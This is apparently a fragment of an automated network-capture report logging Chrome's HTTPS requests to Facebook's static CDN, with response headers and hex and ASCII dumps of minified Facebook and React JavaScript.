                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC16384INData Raw: 73 65 7b 73 64 28 29 3b 69 66 28 69 3d 3d 3d 68 29 7b 66 3d 6c 68 28 64 2c 66 2c 65 29 3b 62 72 65 61 6b 20 61 7d 4e 28 64 2c 66 2c 69 2c 65 29 7d 66 3d 66 2e 63 68 69 6c 64 7d 72 65 74 75 72 6e 20 66 3b 63 61 73 65 20 32 36 3a 72 65 74 75 72 6e 20 55 67 28 64 2c 66 29 2c 6e 75 6c 6c 3d 3d 3d 64 3f 28 65 3d 57 6e 28 66 2e 74 79 70 65 2c 6e 75 6c 6c 2c 66 2e 70 65 6e 64 69 6e 67 50 72 6f 70 73 2c 6e 75 6c 6c 29 29 3f 66 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3d 65 3a 46 7c 7c 28 65 3d 66 2e 74 79 70 65 2c 64 3d 66 2e 70 65 6e 64 69 6e 67 50 72 6f 70 73 2c 68 3d 68 6e 28 4f 62 2e 63 75 72 72 65 6e 74 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 29 2c 68 5b 62 61 5d 3d 66 2c 68 5b 76 6f 5d 3d 64 2c 64 6e 28 68 2c 65 2c 64 29 2c 63 61 28 68 29 2c 66
                                                                                                                                                                                                                                Data Ascii: se{sd();if(i===h){f=lh(d,f,e);break a}N(d,f,i,e)}f=f.child}return f;case 26:return Ug(d,f),null===d?(e=Wn(f.type,null,f.pendingProps,null))?f.memoizedState=e:F||(e=f.type,d=f.pendingProps,h=hn(Ob.current).createElement(e),h[ba]=f,h[vo]=d,dn(h,e,d),ca(h),f
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC16384INData Raw: 65 6d 65 6e 74 54 79 70 65 3d 3d 3d 64 2e 74 79 70 65 29 3b 66 2e 73 74 61 74 65 3d 64 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3b 74 72 79 7b 66 2e 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 6e 6d 6f 75 6e 74 28 29 7d 63 61 74 63 68 28 66 29 7b 5a 28 64 2c 65 2c 66 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6a 69 28 64 2c 65 29 7b 74 72 79 7b 76 61 72 20 66 3d 64 2e 72 65 66 3b 69 66 28 6e 75 6c 6c 21 3d 3d 66 29 7b 76 61 72 20 67 3d 64 2e 73 74 61 74 65 4e 6f 64 65 3b 73 77 69 74 63 68 28 64 2e 74 61 67 29 7b 63 61 73 65 20 32 36 3a 63 61 73 65 20 32 37 3a 63 61 73 65 20 35 3a 76 61 72 20 68 3d 67 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 68 3d 67 7d 32 31 3d 3d 3d 64 2e 74 61 67 26 26 28 68 3d 67 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f
                                                                                                                                                                                                                                Data Ascii: ementType===d.type);f.state=d.memoizedState;try{f.componentWillUnmount()}catch(f){Z(d,e,f)}}function ji(d,e){try{var f=d.ref;if(null!==f){var g=d.stateNode;switch(d.tag){case 26:case 27:case 5:var h=g;break;default:h=g}21===d.tag&&(h=g);"function"===typeo
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC14884INData Raw: 75 6e 63 74 69 6f 6e 20 55 69 28 64 2c 65 2c 66 29 7b 66 3d 66 26 26 30 21 3d 3d 28 65 2e 73 75 62 74 72 65 65 46 6c 61 67 73 26 38 37 37 32 29 3b 66 6f 72 28 65 3d 65 2e 63 68 69 6c 64 3b 6e 75 6c 6c 21 3d 3d 65 3b 29 7b 76 61 72 20 67 3d 65 2e 61 6c 74 65 72 6e 61 74 65 2c 68 3d 64 2c 69 3d 65 2c 6a 3d 69 2e 66 6c 61 67 73 3b 73 77 69 74 63 68 28 69 2e 74 61 67 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 31 3a 63 61 73 65 20 31 35 3a 55 69 28 68 2c 69 2c 66 29 3b 66 69 28 34 2c 69 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 55 69 28 68 2c 69 2c 66 29 3b 67 3d 69 3b 68 3d 67 2e 73 74 61 74 65 4e 6f 64 65 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 68 2e 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 4d 6f 75 6e 74 29 74 72 79 7b 68 2e
                                                                                                                                                                                                                                Data Ascii: unction Ui(d,e,f){f=f&&0!==(e.subtreeFlags&8772);for(e=e.child;null!==e;){var g=e.alternate,h=d,i=e,j=i.flags;switch(i.tag){case 0:case 11:case 15:Ui(h,i,f);fi(4,i);break;case 1:Ui(h,i,f);g=i;h=g.stateNode;if("function"===typeof h.componentDidMount)try{h.


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                68192.168.2.449819157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC374OUTGET /rsrc.php/v3/yM/r/7QNyOKeJP6X.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: GkBFaqN6ASU6ymlIG8mrvA==
                                                                                                                                                                                                                                Expires: Wed, 24 Sep 2025 20:57:11 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: hhMr9O0yOP8KyW4W0LnGKpHWbwIqPOFKXNG7Oh00HkcdojqU+oHZIlrJjdDUon30Z9geDDcOoB/yJ9Fw16QmIQ==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:23 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 49907
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 4c 6f 67 69 6e 46 6f 72 6d 54 6f 67 67 6c 65 22 2c 5b 22 63 78 22 2c 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 67 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 76 61 72 20 65 3d 63 28 22 67 65 22 29 28 22 70 61 73 73 22 29 3b 64 28 22 43 53 53 22 29 2e 68 69 64 65 28 61 29 3b 45 76 65 6e 74 2e 6c 69 73 74 65 6e 28 65 2c 22 6b 65 79 75 70 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 53 74 72 69 6e 67 28 65 2e 76 61 6c 75 65 29 3b 63 2e 6c 65 6e 67 74 68 21 3d 3d 30 3f 28 64 28 22 43 53 53 22 29 2e 73 68 6f 77 28 61 29 2c 64 28 22 43 53 53 22 29 2e
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("LoginFormToggle",["cx","CSS","DOM","ge"],(function(a,b,c,d,e,f,g,h){"use strict";function a(a,b){var e=c("ge")("pass");d("CSS").hide(a);Event.listen(e,"keyup",function(){var c=String(e.value);c.length!==0?(d("CSS").show(a),d("CSS").
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC16384INData Raw: 45 3a 37 32 30 2c 46 41 49 4c 5f 46 41 4c 53 45 5f 4e 45 47 41 54 49 56 45 3a 37 32 31 2c 41 50 50 5f 43 52 41 53 48 3a 37 32 32 2c 54 45 53 54 5f 47 49 4e 44 49 3a 37 32 33 2c 54 54 54 54 3a 37 32 34 2c 42 55 47 5f 42 41 53 48 5f 41 43 54 49 4f 4e 3a 37 32 35 2c 42 55 47 5f 42 41 53 48 5f 54 45 53 54 3a 37 32 36 2c 49 4e 49 54 5f 4d 4f 42 49 4c 45 5f 43 4f 4e 46 49 47 3a 37 32 37 2c 53 55 43 43 45 53 53 5f 57 49 54 48 5f 56 43 5f 44 49 53 41 42 4c 45 44 3a 31 30 30 38 2c 44 45 4c 45 54 45 5f 52 45 43 4f 52 44 3a 31 31 31 35 2c 4e 4f 52 4d 41 4c 5f 53 45 41 52 43 48 5f 4c 45 41 56 45 3a 31 31 37 31 2c 4d 41 57 5f 53 48 49 4d 5f 49 4e 44 45 58 45 44 44 42 5f 53 45 54 55 50 3a 31 33 33 32 2c 4d 41 57 5f 46 54 53 5f 49 4e 44 45 58 45 44 44 42 5f 53 45 54 55
                                                                                                                                                                                                                                Data Ascii: E:720,FAIL_FALSE_NEGATIVE:721,APP_CRASH:722,TEST_GINDI:723,TTTT:724,BUG_BASH_ACTION:725,BUG_BASH_TEST:726,INIT_MOBILE_CONFIG:727,SUCCESS_WITH_VC_DISABLED:1008,DELETE_RECORD:1115,NORMAL_SEARCH_LEAVE:1171,MAW_SHIM_INDEXEDDB_SETUP:1332,MAW_FTS_INDEXEDDB_SETU
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC16384INData Raw: 72 5f 69 64 3a 28 68 7c 7c 28 68 3d 64 28 22 51 50 4c 45 76 65 6e 74 22 29 29 29 2e 67 65 74 4d 61 72 6b 65 72 49 64 28 61 29 2c 61 63 74 69 6f 6e 5f 69 64 3a 35 31 2c 69 6e 73 74 61 6e 63 65 5f 69 64 3a 30 2c 73 61 6d 70 6c 65 5f 72 61 74 65 3a 6b 2c 6d 65 74 68 6f 64 3a 6d 2e 67 65 74 28 65 29 2c 64 61 5f 74 79 70 65 3a 62 2c 64 61 5f 6c 65 76 65 6c 3a 63 2c 6d 65 74 61 64 61 74 61 3a 7b 61 70 70 6c 69 63 61 74 69 6f 6e 5f 61 6e 61 6c 79 74 69 63 73 3a 7b 74 69 6d 65 5f 73 69 6e 63 65 5f 71 70 6c 5f 6d 6f 64 75 6c 65 5f 69 6e 69 74 3a 67 2d 74 68 69 73 2e 24 31 2e 6d 6f 64 75 6c 65 4c 6f 61 64 54 69 6d 65 73 74 61 6d 70 7d 7d 2c 6d 61 72 6b 65 72 5f 74 79 70 65 3a 31 2c 66 6c 61 67 73 3a 31 7d 3b 74 68 69 73 2e 24 31 33 28 6c 28 6b 2c 66 29 29 7d 3b 62
                                                                                                                                                                                                                                Data Ascii: r_id:(h||(h=d("QPLEvent"))).getMarkerId(a),action_id:51,instance_id:0,sample_rate:k,method:m.get(e),da_type:b,da_level:c,metadata:{application_analytics:{time_since_qpl_module_init:g-this.$1.moduleLoadTimestamp}},marker_type:1,flags:1};this.$13(l(k,f))};b
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1266INData Raw: 67 69 6e 49 6e 69 74 69 61 6c 4c 6f 61 64 4c 6f 67 67 65 72 22 2c 5b 22 51 75 69 63 6b 4c 6f 67 41 63 74 69 6f 6e 54 79 70 65 22 2c 22 51 75 69 63 6b 50 65 72 66 6f 72 6d 61 6e 63 65 4c 6f 67 67 65 72 22 2c 22 52 75 6e 22 2c 22 71 70 6c 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 2c 69 3d 31 2c 6a 3d 32 3b 61 3d 7b 6f 6e 4c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 68 7c 7c 28 68 3d 63 28 22 51 75 69 63 6b 50 65 72 66 6f 72 6d 61 6e 63 65 4c 6f 67 67 65 72 22 29 29 29 2e 6d 61 72 6b 65 72 53 74 61 72 74 46 72 6f 6d 4e 61 76 53 74 61 72 74 28 63 28 22 71 70 6c 22 29 2e 5f 28 32 35 30 33 35 30 36 31 37 2c 22 32 34 34 34 22 29 2c 69 29 3b 76 61 72 20 62 3d
                                                                                                                                                                                                                                Data Ascii: ginInitialLoadLogger",["QuickLogActionType","QuickPerformanceLogger","Run","qpl"],(function(a,b,c,d,e,f,g){"use strict";var h,i=1,j=2;a={onLoad:function(a){(h||(h=c("QuickPerformanceLogger"))).markerStartFromNavStart(c("qpl")._(250350617,"2444"),i);var b=


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                69192.168.2.449820157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC374OUTGET /rsrc.php/v3/yg/r/5VtnQAqNe99.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1931INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: pvgShi+mxFj+MB0MDiof2A==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 03:37:04 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: M4F4zSdsEKoHuomFAr90kSYmbwpfZW7RvYrZbl1NpTxpLVSirUr0UGZ6/J8bElPa8JHfxn7Qv5Exz30o/PlfcA==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:23 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 176168
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC15870INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 3a 22 61 76 22 2c 45 4e 43 52 59 50 54 45 44 5f 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 3a 22 65 61 76 22 7d 29 3b 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 4c 6f 67 67 65 72 22 2c 5b 22 63 72 3a 39 39 38 39 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 61 29 7b 72 65 74 75 72 6e 7b 6c 6f 67 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 62
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("ActorURIConfig",[],(function(a,b,c,d,e,f){a=Object.freeze({PARAMETER_ACTOR:"av",ENCRYPTED_PARAMETER_ACTOR:"eav"});f["default"]=a}),66);__d("BanzaiLogger",["cr:9989"],(function(a,b,c,d,e,f,g){function h(a){return{log:function(c,d){b
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC16384INData Raw: 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 22 2c 22 64 69 73 61 62 6c 65 64 2d 69 63 6f 6e 22 3a 22 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 22 2c 22 64 69 73 61 62 6c 65 64 2d 74 65 78 74 22 3a 22 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 22 2c 64 69 76 69 64 65 72 3a 22 23 33 45 34 30 34 32 22 2c 22 65 76 65 6e 74 2d 64 61 74 65 22 3a 22 23 46 33 34 32 35 46 22 2c 22 66 62 2d 77 6f 72 64 6d 61 72 6b 22 3a 22 23 46 46 46 46 46 46 22 2c 22 66 62 2d 6c 6f 67 6f 22 3a 22 23 30 38 36 36 46 46 22 2c 22 66 69 6c 74 65 72 2d 61 63 63 65 6e 74 22 3a 22 69 6e 76 65 72 74 28 34 30 25 29 20 73 65 70 69 61 28 35 32 25 29 20 73 61 74 75 72 61 74 65 28 32 30 30 25 29 20 73 61 74 75 72 61
                                                                                                                                                                                                                                Data Ascii: a(255, 255, 255, 0.3)","disabled-icon":"rgba(255, 255, 255, 0.3)","disabled-text":"rgba(255, 255, 255, 0.3)",divider:"#3E4042","event-date":"#F3425F","fb-wordmark":"#FFFFFF","fb-logo":"#0866FF","filter-accent":"invert(40%) sepia(52%) saturate(200%) satura
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC16384INData Raw: 65 6e 2d 73 65 63 6f 6e 64 61 72 79 22 3a 22 72 67 62 28 32 32 37 2c 32 35 30 2c 32 32 34 29 22 2c 22 67 72 65 65 6e 2d 74 65 72 74 69 61 72 79 22 3a 22 72 67 62 28 32 36 2c 36 38 2c 32 37 29 22 2c 22 6d 61 67 65 6e 74 61 2d 70 72 69 6d 61 72 79 22 3a 22 72 67 62 28 32 31 35 2c 37 37 2c 32 30 34 29 22 2c 22 6d 61 67 65 6e 74 61 2d 73 65 63 6f 6e 64 61 72 79 22 3a 22 72 67 62 28 32 35 35 2c 32 33 39 2c 32 35 34 29 22 2c 22 6d 61 67 65 6e 74 61 2d 74 65 72 74 69 61 72 79 22 3a 22 72 67 62 28 39 36 2c 33 36 2c 39 31 29 22 2c 22 6f 72 61 6e 67 65 2d 70 72 69 6d 61 72 79 22 3a 22 72 67 62 28 32 30 38 2c 31 30 38 2c 32 30 29 22 2c 22 6f 72 61 6e 67 65 2d 73 65 63 6f 6e 64 61 72 79 22 3a 22 72 67 62 28 32 35 35 2c 32 34 31 2c 32 33 39 29 22 2c 22 6f 72 61 6e 67
                                                                                                                                                                                                                                Data Ascii: en-secondary":"rgb(227,250,224)","green-tertiary":"rgb(26,68,27)","magenta-primary":"rgb(215,77,204)","magenta-secondary":"rgb(255,239,254)","magenta-tertiary":"rgb(96,36,91)","orange-primary":"rgb(208,108,20)","orange-secondary":"rgb(255,241,239)","orang
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC16384INData Raw: 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 2c 20 30 2c 20 30 2e 31 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 70 61 73 73 69 76 65 2d 6d 6f 76 65 2d 6f 75 74 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 2c 20 30 2c 20 30 2e 31 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 71 75 69 63 6b 2d 6d 6f 76 65 2d 69 6e 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 2c 20 30 2e 39 2c 20 30 2e 32 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 71 75 69 63 6b 2d 6d 6f 76 65 2d 6f 75 74 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 2c 20 30 2e 39 2c 20 30 2e 32 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 66 61 64 65 2d 69 6e 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65
                                                                                                                                                                                                                                Data Ascii: bic-bezier(0.5, 0, 0.1, 1)","fds-animation-passive-move-out":"cubic-bezier(0.5, 0, 0.1, 1)","fds-animation-quick-move-in":"cubic-bezier(0.1, 0.9, 0.2, 1)","fds-animation-quick-move-out":"cubic-bezier(0.1, 0.9, 0.2, 1)","fds-animation-fade-in":"cubic-bezie
                                                                                                                                                                                                                                2024-09-29 04:54:23 UTC1500INData Raw: 6e 63 65 28 29 3d 3d 3d 33 29 72 65 74 75 72 6e 21 30 3b 65 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 69 66 28 66 2e 74 72 69 67 67 65 72 4f 6e 52 65 70 65 61 74 73 3d 3d 3d 21 31 26 26 62 2e 72 65 70 65 61 74 3d 3d 3d 21 30 29 72 65 74 75 72 6e 21 31 3b 69 66 28 65 21 3d 6e 75 6c 6c 29 7b 69 66 28 66 2e 63 6f 6d 6d 61 6e 64 21 3d 6e 75 6c 6c 26 26 73 28 62 2e 74 61 72 67 65 74 2c 66 29 26 26 67 2e 67 65 74 4d 6f 64 69 66 69 65 64 4b 65 79 62 6f 61 72 64 53 68 6f 72 74 63 75 74 73 50 72 65 66 65 72 65 6e 63 65 28 29 3d 3d 3d 34 29 7b 77 2e 63 75 72 72 65 6e 74 28 66 2e 63 6f 6d 6d 61 6e 64 2c 66 2e 73 69 6e 67 6c 65 43 68 61 72 44 65 73 63 72 69 70 74 69 6f 6e 29 3b 72 65 74 75 72 6e 21 30 7d 68 3d 67 26 26 67 2e 67 65 74 41 72 65 53
                                                                                                                                                                                                                                Data Ascii: nce()===3)return!0;e&&b.preventDefault()}if(f.triggerOnRepeats===!1&&b.repeat===!0)return!1;if(e!=null){if(f.command!=null&&s(b.target,f)&&g.getModifiedKeyboardShortcutsPreference()===4){w.current(f.command,f.singleCharDescription);return!0}h=g&&g.getAreS
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC14884INData Raw: 43 6f 6d 6d 61 6e 64 43 6f 6e 74 65 78 74 22 29 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 7a 2c 63 68 69 6c 64 72 65 6e 3a 42 7d 29 7d 64 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 64 2e 6e 61 6d 65 2b 22 20 5b 66 72 6f 6d 20 22 2b 66 2e 69 64 2b 22 5d 22 3b 72 65 74 75 72 6e 20 64 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 63 72 65 61 74 65 4b 65 79 43 6f 6d 6d 61 6e 64 57 69 64 67 65 74 22 2c 5b 22 63 72 65 61 74 65 4b 65 79 43 6f 6d 6d 61 6e 64 57 72 61 70 70 65 72 22 2c 22 72 65 61 63 74 22 2c 22 72 65 63 6f 76 65 72 61 62 6c 65 56 69 6f 6c 61 74 69 6f 6e 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 2c 69 3d 68 7c
                                                                                                                                                                                                                                Data Ascii: CommandContext").Provider,{value:z,children:B})}d.displayName=d.name+" [from "+f.id+"]";return d}g["default"]=a}),98);__d("createKeyCommandWidget",["createKeyCommandWrapper","react","recoverableViolation"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h|
                                                                                                                                                                                                                                2024-09-29 04:54:24 UTC16384INData Raw: 26 28 69 7c 7c 28 69 3d 63 28 22 73 75 73 70 65 6e 64 4f 72 54 68 72 6f 77 49 66 55 73 65 64 49 6e 53 53 52 22 29 29 29 28 22 4c 6f 61 64 69 6e 67 20 6f 66 20 62 6f 6f 74 6c 6f 61 64 65 64 20 61 6e 64 20 54 33 20 63 6f 6d 70 6f 6e 65 6e 74 73 20 69 73 20 64 69 73 61 62 6c 65 64 20 64 75 72 69 6e 67 20 53 53 52 22 29 3b 76 61 72 20 64 3d 62 2e 67 65 74 4d 6f 64 75 6c 65 49 64 28 29 3b 69 66 28 21 6a 5b 64 5d 29 7b 62 3d 6a 5b 64 5d 3d 62 2e 6c 6f 61 64 28 29 3b 62 5b 22 66 69 6e 61 6c 6c 79 22 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6a 5b 64 5d 7d 29 7d 74 68 72 6f 77 20 6a 5b 64 5d 7d 72 65 74 75 72 6e 20 61 7d 67 2e 70 72 65 6c 6f 61 64 3d 61 3b 67 2e 72 65 61 64 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 43 50 55 50 72 65 73 73 75
